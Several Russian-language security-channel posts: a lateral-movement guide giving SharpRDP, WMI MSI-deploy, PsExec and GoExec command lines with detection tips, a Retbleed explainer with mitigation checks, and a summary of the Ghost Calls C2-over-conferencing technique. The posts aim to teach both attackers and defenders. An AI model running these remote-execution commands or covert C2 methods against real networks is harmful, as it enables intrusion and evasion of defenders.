Горизонтальное перемещение: тени в инфраструктуре

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Продолжаем говорить про перемещение, сегодня будут интересные утилиты.

Тихий проход через Headless RDP 😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:

SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd

Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.

WMI с MSI: установка, которая не то, чем кажется 🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:

Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred

Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.

PsExec: громкий, но надежный 🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:

PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe

Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.

GoExec: современный шпион 👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:

goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe

Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.

Как итог 🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.

Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.

Retbleed: Google показала как красть память любого процесса
#google #AMD #Intel #CPU #hardware

Исследователи Google продемонстрировали значительно улучшенный эксплойт уязвимости Retbleed, который позволяет читать память любого процесса на современных CPU AMD и Intel. Скорость кражи данных достигает 13 КБ/с даже из песочницы.

Retbleed - это уязвимость в современных процессорах, обнаруженная в 2022 году исследователями ETH Zürich. Она использует спекулятивное выполнение инструкций - технологию, которая позволяет CPU предсказывать и выполнять команды заранее для повышения производительности.

Что такое спекулятивное выполнение:
Современные процессоры не ждут подтверждения каждой инструкции, а выполняют их "на опережение" основываясь на предсказаниях. Это как читать следующую страницу книги, пока обдумываете предыдущую. Если предсказание оказалось неверным, результат отбрасывается, но следы остаются в кэше процессора.

➡️Механизм атаки:

Шаг 1: Обучение предсказателя
Атакующий "тренирует" систему предсказания переходов процессора, заставляя её ожидать определенные адреса памяти при выполнении return-инструкций.

Шаг 2: Спекулятивное выполнение
Когда процессор встречает return, он спекулятивно выполняет код по предсказанному адресу, даже если этот адрес содержит данные жертвы.

Шаг 3: Извлечение через кэш
Хотя результат спекулятивного выполнения отбрасывается, данные остаются в кэше. Атакующий анализирует время доступа к памяти и восстанавливает украденную информацию.

➡️Улучшения Google:
Оригинальный эксплойт Retbleed работал только в лабораторных условиях. Команда Google (Matteo Rizzo и Andy Nguyen) решила три критические проблемы:

Обход KASLR: Kernel Address Space Layout Randomization рандомизирует расположение кода ядра в памяти. Исследователи использовали микроархитектурные side-channel атаки для определения реальных адресов.

Создание идеальных гаджетов: Через спекулятивное ROP (Return Oriented Programming) они научились создавать оптимальные последовательности инструкций для утечки данных.

➡️Работа в песочнице: Эксплойт функционирует даже в строго ограниченной среде без привилегий, что делает его особенно опасным.

➡️Практические результаты:
- Скорость утечки: ~13 КБ/с с высокой точностью
- Работает из непривилегированного процесса в песочнице
- Позволяет перечислить все запущенные процессы и VM
- Может красть криптографические ключи и другие чувствительные данные
- Работает из виртуальных машин для кражи данных хоста

➡️Интересные факты:
Эксплойт работает против AMD Zen 2 процессоров, которые широко используются в облачных сервисах. Это означает, что один арендатор облака потенциально может читать данные других. Особенно опасно то, что атака работает из виртуальных машин - гость может красть данные хоста, что нарушает основы изоляции в облачных средах.

➡️Защитные меры:
Существующие митигации дорогостоящие и значительно влияют на производительность:

Микрокод процессора: AMD и Intel выпустили обновления микрокода, но они замедляют работу на 10-20%.
Отключение спекулятивного выполнения: Радикальная мера, которая может снизить производительность на 30-50%.
Изоляция процессов: Усиленная изоляция между процессами и виртуальными машинами.

➡️Проверка уязвимости:

# Проверка статуса митигаций Retbleed
cat /sys/devices/system/cpu/vulnerabilities/retbleed

# Проверка версии микрокода
grep microcode /proc/cpuinfo

➡️Настройки ядра:

# Включение всех митигаций (влияет на производительность)
echo "retbleed=auto" >> /etc/default/grub
update-grub

➡️Источники:
Google Bug Hunters
PoC

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Ghost Calls: Abusing Web Conferencing for Covert Command & Control 😎

Август выдался жарким не только по погоде — на Black Hat USA ресерчеры из Praetorian показали необычную технику, получившую название Ghost Calls 🔥

Она позволяет туннелировать трафик C2-агентов через сервисы видеоконференций (MS Teams, Zoom), маскируя его под обычные звонки 🎩

❗️ Как работает?

Red Team оператор использует протоколы и инфраструктуру звонков TURN серверов для передачи данных, благодаря чему трафик выглядит как легитимный VoIP-трафик. Даже внимательный SOC-аналитик может принять его за рабочую коммуникацию, что в свою очередь позволит коммуницировать с C2 в более тихом режиме и обходить системы обнаружения.

🔗 Research: https://www.praetorian.com/blog/ghost-calls-abusing-web-conferencing-for-covert-command-control-part-1-of-2/

🔗 Tool: https://github.com/praetorian-inc/turnt

P.S Доклад с BlackHat прикрепил в комментах к посту

Eng. version

This August was hot not just in weather — at Black Hat USA, researchers from Praetorian presented a new technique called Ghost Calls 🔥

It allows an attacker to tunnel C2 agent traffic through video conferencing services (MS Teams, Zoom), disguising it as legitimate calls 🎩

❗️ How it works?

Red Team operators leverage call protocols and infrastructure of TURN servers to transfer data, making traffic appear like normal VoIP communications. Even an experienced SOC analyst might mistake it for routine work traffic, this can allow to establish more evasive and silent C2 channels and bypass detection systems

🔗 Tool: https://github.com/praetorian-inc/turnt

P.S Presentation from BlackHat is attached in comments

🧢 s0ld13r